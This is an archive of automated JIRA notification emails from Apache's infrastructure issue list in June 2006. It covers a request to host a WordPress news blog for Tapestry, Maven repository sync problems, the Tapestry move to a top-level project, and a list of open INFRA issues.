Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 63097 invoked from network); 11 Jun 2006 17:57:43 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 11 Jun 2006 17:57:43 -0000 Received: (qmail 13256 invoked by uid 500); 11 Jun 2006 17:57:41 -0000 Delivered-To: [email protected] Received: (qmail 12982 invoked by uid 500); 11 Jun 2006 17:57:40 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 12970 invoked by uid 99); 11 Jun 2006 17:57:40 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 11 Jun 2006 10:57:40 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 11 Jun 2006 10:57:38 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 62B5D7141FA for <[email protected]>; Sun, 11 Jun 2006 17:56:30 +0000 (GMT) Message-ID: <22083327.1150048590401.JavaMail.jira@brutus> Date: Sun, 11 Jun 2006 17:56:30 +0000 (GMT+00:00) From: "Garrett Rooney (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (INFRA-842) cough...umm..execute php ? In-Reply-To: <19489091.1149972930079.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-842?page=comments#action_12415772 ] Garrett Rooney commented on INFRA-842: -------------------------------------- Perhaps Tapestry could consider one of any number of blog packages that can render content to static files that can be checked in to svn like the rest of your web site? It wouldn't give you things like comments and so forth, but it would provide a way to manage a news section of the site. > cough...umm..execute php ? > -------------------------- > > Key: INFRA-842 > URL: http://issues.apache.org/jira/browse/INFRA-842 > Project: Infrastructure > Type: Wish > Security: public(Regular issues) > Components: HTTP Server > Environment: minotaur (or ajax I guess ultimately?.. ) > Reporter: Jesse Kuhnert > Priority: Minor > > Probably a crackpot idea fraught with disaster if allowed to happen all over the ASF, but the sort of modern trend of some open source projects is to provide more dynamic content on their site, like news is a huge one. > Very specifically I'm asking if /www/tapestry.apache.org/ could have a new sub directory, /www/tapestry.apache.org/blog/ that contains a wordpress installation to run a "news" sort of section of the site with. ..Something sort of like http://blog.dojotoolkit.org/ > Normally wordpress likes to connect to a mysql (or other) DB server as well, I don't mind having ajax connect back out to a hosted mysql server not being run by infra if it helps. > It's understandable if it is asking too much, just think it might be something the ASF might want to consider at some point.. -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Sun Jun 11 18:01:47 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 64924 invoked from network); 11 Jun 2006 18:01:46 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 11 Jun 2006 18:01:46 -0000 Received: (qmail 21862 invoked by uid 500); 11 Jun 2006 18:01:44 -0000 Delivered-To: [email protected] Received: (qmail 21463 invoked by uid 500); 11 Jun 2006 18:01:42 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 21272 invoked by uid 99); 11 Jun 2006 18:01:41 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 11 Jun 2006 11:01:41 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 11 Jun 2006 11:01:40 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 9A63E7141F9 for <[email protected]>; Sun, 11 Jun 2006 18:00:31 +0000 (GMT) Message-ID: <16901685.1150048831629.JavaMail.jira@brutus> Date: Sun, 11 Jun 2006 18:00:31 +0000 (GMT+00:00) From: "Jesse Kuhnert (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (INFRA-842) cough...umm..execute php ? In-Reply-To: <19489091.1149972930079.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-842?page=comments#action_12415775 ] Jesse Kuhnert commented on INFRA-842: ------------------------------------- Thanks for replying to me at least :) I was thinking that there's nothing stopping me from using some js on these pages right? I could probably write up a quick rss feed parser using dojo's cross domain loader stuff to display news items on a page (when I have time... ) > cough...umm..execute php ? > -------------------------- > > Key: INFRA-842 > URL: http://issues.apache.org/jira/browse/INFRA-842 > Project: Infrastructure > Type: Wish > Security: public(Regular issues) > Components: HTTP Server > Environment: minotaur (or ajax I guess ultimately?.. ) > Reporter: Jesse Kuhnert > Priority: Minor > > Probably a crackpot idea fraught with disaster if allowed to happen all over the ASF, but the sort of modern trend of some open source projects is to provide more dynamic content on their site, like news is a huge one. > Very specifically I'm asking if /www/tapestry.apache.org/ could have a new sub directory, /www/tapestry.apache.org/blog/ that contains a wordpress installation to run a "news" sort of section of the site with. ..Something sort of like http://blog.dojotoolkit.org/ > Normally wordpress likes to connect to a mysql (or other) DB server as well, I don't mind having ajax connect back out to a hosted mysql server not being run by infra if it helps. > It's understandable if it is asking too much, just think it might be something the ASF might want to consider at some point.. -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Sun Jun 11 23:59:48 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 25540 invoked from network); 11 Jun 2006 23:59:45 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 11 Jun 2006 23:59:45 -0000 Received: (qmail 59775 invoked by uid 500); 11 Jun 2006 23:59:41 -0000 Delivered-To: [email protected] Received: (qmail 59441 invoked by uid 500); 11 Jun 2006 23:59:40 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 59430 invoked by uid 99); 11 Jun 2006 23:59:40 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 11 Jun 2006 16:59:40 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 11 Jun 2006 16:59:39 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id A14997141F6 for <[email protected]>; Sun, 11 Jun 2006 23:58:30 +0000 (GMT) Message-ID: <23026056.1150070310657.JavaMail.jira@brutus> Date: Sun, 11 Jun 2006 23:58:30 +0000 (GMT+00:00) From: "Brett Porter (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Assigned: (INFRA-841) Maven repositories not being synchronized? In-Reply-To: <17497650.1149923250493.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-841?page=all ] Brett Porter reassigned INFRA-841: ---------------------------------- Assign To: Brett Porter > Maven repositories not being synchronized? > ------------------------------------------ > > Key: INFRA-841 > URL: http://issues.apache.org/jira/browse/INFRA-841 > Project: Infrastructure > Type: Bug > Security: public(Regular issues) > Reporter: Jukka Zitting > Assignee: Brett Porter > Priority: Minor > > (Not sure if this is the correct place to ask, please let me know where to go if not.) > Has there been some changes in the way the Maven 1 repository at .../dist/java-repository is synchronized with the repository at Ibiblio? I published the recently released Apache Jackrabbit 1.0.1 artifacts in the Apache Maven 1 repository, but after ten days the files are still not [email protected]. > Compare: > http://www.ibiblio.org/maven/org.apache.jackrabbit/jars/ > http://www.apache.org/dist/java-repository/org.apache.jackrabbit/jars/ -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Sun Jun 11 23:59:52 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 25943 invoked from network); 11 Jun 2006 23:59:49 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 11 Jun 2006 23:59:48 -0000 Received: (qmail 60162 invoked by uid 500); 11 Jun 2006 23:59:45 -0000 Delivered-To: [email protected] Received: (qmail 59835 invoked by uid 500); 11 Jun 2006 23:59:42 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 59797 invoked by uid 99); 11 Jun 2006 23:59:41 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 11 Jun 2006 16:59:41 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 11 Jun 2006 16:59:40 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id F41E9714219 for <[email protected]>; Sun, 11 Jun 2006 23:58:31 +0000 (GMT) Message-ID: <28629999.1150070311997.JavaMail.jira@brutus> Date: Sun, 11 Jun 2006 23:58:31 +0000 (GMT+00:00) From: "Brett Porter (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (INFRA-841) Maven repositories not being synchronized? In-Reply-To: <17497650.1149923250493.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-841?page=comments#action_12415793 ] Brett Porter commented on INFRA-841: ------------------------------------ Maven are working on getting this up and running again. We've been having technical difficulties. > Maven repositories not being synchronized? > ------------------------------------------ > > Key: INFRA-841 > URL: http://issues.apache.org/jira/browse/INFRA-841 > Project: Infrastructure > Type: Bug > Security: public(Regular issues) > Reporter: Jukka Zitting > Assignee: Brett Porter > Priority: Minor > > (Not sure if this is the correct place to ask, please let me know where to go if not.) > Has there been some changes in the way the Maven 1 repository at .../dist/java-repository is synchronized with the repository at Ibiblio? I published the recently released Apache Jackrabbit 1.0.1 artifacts in the Apache Maven 1 repository, but after ten days the files are still not [email protected]. > Compare: > http://www.ibiblio.org/maven/org.apache.jackrabbit/jars/ > http://www.apache.org/dist/java-repository/org.apache.jackrabbit/jars/ -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Mon Jun 12 16:06:52 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 86777 invoked from network); 12 Jun 2006 16:06:50 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 12 Jun 2006 16:06:50 -0000 Received: (qmail 74303 invoked by uid 500); 12 Jun 2006 16:06:42 -0000 Delivered-To: [email protected] Received: (qmail 74044 invoked by uid 500); 12 Jun 2006 16:06:41 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 73993 invoked by uid 99); 12 Jun 2006 16:06:40 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 12 Jun 2006 09:06:40 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 12 Jun 2006 09:06:40 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 6EB6F7141FA for <[email protected]>; Mon, 12 Jun 2006 16:05:30 +0000 (GMT) Message-ID: <4174275.1150128330423.JavaMail.jira@brutus> Date: Mon, 12 Jun 2006 16:05:30 +0000 (GMT+00:00) From: "Jesse Kuhnert (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (INFRA-843) final items to complete tapestry move from jakarta to TLP MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N final items to complete tapestry move from jakarta to TLP --------------------------------------------------------- Key: INFRA-843 URL: http://issues.apache.org/jira/browse/INFRA-843 Project: Infrastructure Type: Task Security: public (Regular issues) Components: TLP Admin Environment: minotaur Reporter: Jesse Kuhnert The new TLP site is mostly complete, http://tapestry.apache.org. The old documentation for tapestry has been copied over to the new /www/tapestry.apache.org directories. The outstanding items I'm not sure how to handle still are: -) How to handle migrating existing bookmarks/users over to the new site? Can we setup a global html page with some text like "Tapestry has moved to tapestry.apache.org, your browser will be redirected in N seconds..." ? -) What to do about old download directories/jakarta site history listing those releases? -) What to do about jakarta site in general..Does it the move get a news item and the link taken out or...? Those are the only migratory issues I can think of right now. I still need to get final approval from Howard Lewis-Ship before anything permanent is done but we can at least establish what the general plan of action is now. -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Mon Jun 12 16:16:48 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 89536 invoked from network); 12 Jun 2006 16:16:45 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 12 Jun 2006 16:16:45 -0000 Received: (qmail 87862 invoked by uid 500); 12 Jun 2006 16:16:43 -0000 Delivered-To: [email protected] Received: (qmail 87512 invoked by uid 500); 12 Jun 2006 16:16:42 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 87501 invoked by uid 99); 12 Jun 2006 16:16:41 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 12 Jun 2006 09:16:41 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 12 Jun 2006 09:16:41 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 6774A71428D for <[email protected]>; Mon, 12 Jun 2006 16:15:31 +0000 (GMT) Message-ID: <30345545.1150128931419.JavaMail.jira@brutus> Date: Mon, 12 Jun 2006 16:15:31 +0000 (GMT+00:00) From: "Joshua Slive (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (INFRA-843) final items to complete tapestry move from jakarta to TLP In-Reply-To: <4174275.1150128330423.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-843?page=comments#action_12415873 ] Joshua Slive commented on INFRA-843: ------------------------------------ For the websites, you just need to drop an .htaccess files in the appropriate directories with something like Redirect pemanent /tapestry/ http://tapestry.apache.org/ For the dist directories, you should just move them and drop a README in the old directory pointing to the new location. At some point you might want to clean up archives.apache.org/dist as well. > final items to complete tapestry move from jakarta to TLP > --------------------------------------------------------- > > Key: INFRA-843 > URL: http://issues.apache.org/jira/browse/INFRA-843 > Project: Infrastructure > Type: Task > Security: public(Regular issues) > Components: TLP Admin > Environment: minotaur > Reporter: Jesse Kuhnert > > The new TLP site is mostly complete, http://tapestry.apache.org. The old documentation for tapestry has been copied over to the new /www/tapestry.apache.org directories. > The outstanding items I'm not sure how to handle still are: > -) How to handle migrating existing bookmarks/users over to the new site? Can we setup a global html page with some text like "Tapestry has moved to tapestry.apache.org, your browser will be redirected in N seconds..." ? > -) What to do about old download directories/jakarta site history listing those releases? > -) What to do about jakarta site in general..Does it the move get a news item and the link taken out or...? > Those are the only migratory issues I can think of right now. I still need to get final approval from Howard Lewis-Ship before anything permanent is done but we can at least establish what the general plan of action is now. -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Mon Jun 12 20:36:46 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 87837 invoked from network); 12 Jun 2006 20:36:46 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 12 Jun 2006 20:36:46 -0000 Received: (qmail 78241 invoked by uid 500); 12 Jun 2006 20:36:44 -0000 Delivered-To: [email protected] Received: (qmail 78074 invoked by uid 500); 12 Jun 2006 20:36:44 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 78039 invoked by uid 99); 12 Jun 2006 20:36:43 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 12 Jun 2006 13:36:43 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 12 Jun 2006 13:36:42 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id DBDDE71428E for <[email protected]>; Mon, 12 Jun 2006 20:35:31 +0000 (GMT) Message-ID: <13265897.1150144531897.JavaMail.jira@brutus> Date: Mon, 12 Jun 2006 20:35:31 +0000 (GMT+00:00) From: "Noel J. Bergman (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (INFRA-842) cough...umm..execute php ? In-Reply-To: <19489091.1149972930079.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-842?page=comments#action_12415905 ] Noel J. Bergman commented on INFRA-842: --------------------------------------- See the Roller project in the Incubator. They are likely to setup a zone soon, as have other projects to demo their technology, and there is talk of setting up Roller for the ASF to use to publish project news and other ASF feeds (*not* personal feeds, which is what planetapache is for). > cough...umm..execute php ? > -------------------------- > > Key: INFRA-842 > URL: http://issues.apache.org/jira/browse/INFRA-842 > Project: Infrastructure > Type: Wish > Security: public(Regular issues) > Components: HTTP Server > Environment: minotaur (or ajax I guess ultimately?.. ) > Reporter: Jesse Kuhnert > Priority: Minor > > Probably a crackpot idea fraught with disaster if allowed to happen all over the ASF, but the sort of modern trend of some open source projects is to provide more dynamic content on their site, like news is a huge one. > Very specifically I'm asking if /www/tapestry.apache.org/ could have a new sub directory, /www/tapestry.apache.org/blog/ that contains a wordpress installation to run a "news" sort of section of the site with. ..Something sort of like http://blog.dojotoolkit.org/ > Normally wordpress likes to connect to a mysql (or other) DB server as well, I don't mind having ajax connect back out to a hosted mysql server not being run by infra if it helps. > It's understandable if it is asking too much, just think it might be something the ASF might want to consider at some point.. -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Wed Jun 14 01:32:46 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 70895 invoked from network); 14 Jun 2006 01:32:46 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 14 Jun 2006 01:32:46 -0000 Received: (qmail 63041 invoked by uid 500); 14 Jun 2006 01:32:44 -0000 Delivered-To: [email protected] Received: (qmail 62765 invoked by uid 500); 14 Jun 2006 01:32:43 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 62754 invoked by uid 99); 14 Jun 2006 01:32:43 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 13 Jun 2006 18:32:43 -0700 X-ASF-Spam-Status: No, hits=0.6 required=10.0 tests=NO_REAL_NAME X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 13 Jun 2006 18:32:42 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 6683F7141F9 for <[email protected]>; Wed, 14 Jun 2006 01:31:30 +0000 (GMT) Message-ID: <503194.1150248690389.JavaMail.jira@brutus> Date: Wed, 14 Jun 2006 01:31:30 +0000 (GMT+00:00) From: [email protected] To: [email protected] Subject: [jira] Subscription: Open INFRA issues MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Issue Subscription Filter: Open INFRA issues (80 issues) Subscriber: [email protected] Key Summary INFRA-843 final items to complete tapestry move from jakarta to TLP http://issues.apache.org/jira/browse/INFRA-843 INFRA-841 Maven repositories not being synchronized? http://issues.apache.org/jira/browse/INFRA-841 INFRA-840 Apache Dist, New US Mirror http://issues.apache.org/jira/browse/INFRA-840 INFRA-839 Private list for Tuscany project http://issues.apache.org/jira/browse/INFRA-839 INFRA-838 Restore Apache mirror http://issues.apache.org/jira/browse/INFRA-838 INFRA-837 New mirror in FRANCE http://issues.apache.org/jira/browse/INFRA-837 INFRA-836 new wiki request: lucy http://issues.apache.org/jira/browse/INFRA-836 INFRA-835 Please add new mirror in Germany, Hannover http://issues.apache.org/jira/browse/INFRA-835 INFRA-834 Please add new mirror in Germany, Hannover http://issues.apache.org/jira/browse/INFRA-834 INFRA-831 New NL mirror http://issues.apache.org/jira/browse/INFRA-831 INFRA-828 New / Renewed Mirror in USA http://issues.apache.org/jira/browse/INFRA-828 INFRA-827 New mirror - please add http://issues.apache.org/jira/browse/INFRA-827 INFRA-826 Mail archives out of sync http://issues.apache.org/jira/browse/INFRA-826 INFRA-825 Issue visibility not enabled in the form associated to the issue creation. http://issues.apache.org/jira/browse/INFRA-825 INFRA-824 Internal error when creating Tomcat 6 issue. http://issues.apache.org/jira/browse/INFRA-824 INFRA-823 Create HiveMind TLP http://issues.apache.org/jira/browse/INFRA-823 INFRA-822 New mirror located in Amsterdam, The Netherlands http://issues.apache.org/jira/browse/INFRA-822 INFRA-821 Disable weekly Bugzilla reports for Jakarta Commons http://issues.apache.org/jira/browse/INFRA-821 INFRA-820 new http mirror for apache.org with german location http://issues.apache.org/jira/browse/INFRA-820 INFRA-819 New Mirror http://issues.apache.org/jira/browse/INFRA-819 INFRA-818 Please add new mirror to list http://issues.apache.org/jira/browse/INFRA-818 INFRA-817 New Low Speed Mirror in Australia http://issues.apache.org/jira/browse/INFRA-817 INFRA-815 SPF Records for incubator.apache.org are wrong. http://issues.apache.org/jira/browse/INFRA-815 INFRA-814 New Apache mirror http://issues.apache.org/jira/browse/INFRA-814 INFRA-813 Import Jira projects into the main Jira http://issues.apache.org/jira/browse/INFRA-813 INFRA-809 New mirror in Taiwan,mirror.tw http://issues.apache.org/jira/browse/INFRA-809 INFRA-808 Install request: apr v1.2.7 Solaris PKG within the zones http://issues.apache.org/jira/browse/INFRA-808 INFRA-805 recent Subversion change(s) not in Jira http://issues.apache.org/jira/browse/INFRA-805 INFRA-800 New mirror in Argentina http://issues.apache.org/jira/browse/INFRA-800 INFRA-797 Create new mailing lists for HiveMind http://issues.apache.org/jira/browse/INFRA-797 INFRA-796 Move HiveMind wiki from Jakarta to top-level http://issues.apache.org/jira/browse/INFRA-796 INFRA-793 Add reply-to header to Tomcat digest lists http://issues.apache.org/jira/browse/INFRA-793 INFRA-782 Need to switch nameservers for apachecon.com urgently http://issues.apache.org/jira/browse/INFRA-782 INFRA-781 Please renew the mirror at our location http://issues.apache.org/jira/browse/INFRA-781 INFRA-777 Use wrapper to automatically restart Java services http://issues.apache.org/jira/browse/INFRA-777 INFRA-768 Missing HTML escaping in ViewCVS' svn diffs http://issues.apache.org/jira/browse/INFRA-768 INFRA-761 Import Torque issues into JIRA http://issues.apache.org/jira/browse/INFRA-761 INFRA-738 Create initial subscriber list for OFBiz lists, using input from OFBiz project http://issues.apache.org/jira/browse/INFRA-738 INFRA-734 Alias for commits to /xmlgraphics/commons http://issues.apache.org/jira/browse/INFRA-734 INFRA-726 Remove old Lucene @jakarta.apache.org lists http://issues.apache.org/jira/browse/INFRA-726 INFRA-710 Nameserver entries for myfaces.org http://issues.apache.org/jira/browse/INFRA-710 INFRA-708 Rename/move of mailing list breaks archive URIs http://issues.apache.org/jira/browse/INFRA-708 INFRA-705 create [email protected] to supercede [email protected] http://issues.apache.org/jira/browse/INFRA-705 INFRA-698 Monitoring lenya.zones server http://issues.apache.org/jira/browse/INFRA-698 INFRA-690 Please create new Wiki for the Public Relations Committee (PRC) at wiki.apache.org/Talks http://issues.apache.org/jira/browse/INFRA-690 INFRA-624 svn --revprop svn:log changes not reflected in Jira issues http://issues.apache.org/jira/browse/INFRA-624 INFRA-608 Document Xserve installations http://issues.apache.org/jira/browse/INFRA-608 INFRA-607 Harden Xserve installations http://issues.apache.org/jira/browse/INFRA-607 INFRA-602 Configure Xserves as mail spool servers http://issues.apache.org/jira/browse/INFRA-602 INFRA-589 Replicate SpamAssassin Bugzilla e-mail comment setup on Ajax http://issues.apache.org/jira/browse/INFRA-589 INFRA-568 Account creation process should take care of apcvs ownership http://issues.apache.org/jira/browse/INFRA-568 INFRA-559 JIRA (and Bugzilla?) can't handle non-latin characters http://issues.apache.org/jira/browse/INFRA-559 INFRA-558 please close the scarab tracker for Turbine 2 http://issues.apache.org/jira/browse/INFRA-558 INFRA-537 A few updates for the XML Graphics project http://issues.apache.org/jira/browse/INFRA-537 INFRA-443 setup xmlbeans-cxx subversion for incubator http://issues.apache.org/jira/browse/INFRA-443 INFRA-424 Install OpenSSL into /opt on the zones http://issues.apache.org/jira/browse/INFRA-424 INFRA-412 Implement proper mail-to-jira bridge http://issues.apache.org/jira/browse/INFRA-412 INFRA-407 Links on Saved searches Preferences tab are missing http://issues.apache.org/jira/browse/INFRA-407 INFRA-398 Turn off eyebrowse? http://issues.apache.org/jira/browse/INFRA-398 INFRA-397 Create a simple commandline tool for searching private e-mail archives http://issues.apache.org/jira/browse/INFRA-397 INFRA-391 Create a web application for creating and editing ~/.forward files http://issues.apache.org/jira/browse/INFRA-391 INFRA-371 point myfaces.org to myfaces.apache.org http://issues.apache.org/jira/browse/INFRA-371 INFRA-352 Tweak the message body for jira notifications http://issues.apache.org/jira/browse/INFRA-352 INFRA-348 Make account-mailer provide host information http://issues.apache.org/jira/browse/INFRA-348 INFRA-347 Install svn:infrastructure/trunk/tools on all our machines http://issues.apache.org/jira/browse/INFRA-347 INFRA-346 Seriously clean up the infrastructure website documentation http://issues.apache.org/jira/browse/INFRA-346 INFRA-345 Write a script to detect unused accounts http://issues.apache.org/jira/browse/INFRA-345 INFRA-343 Write a 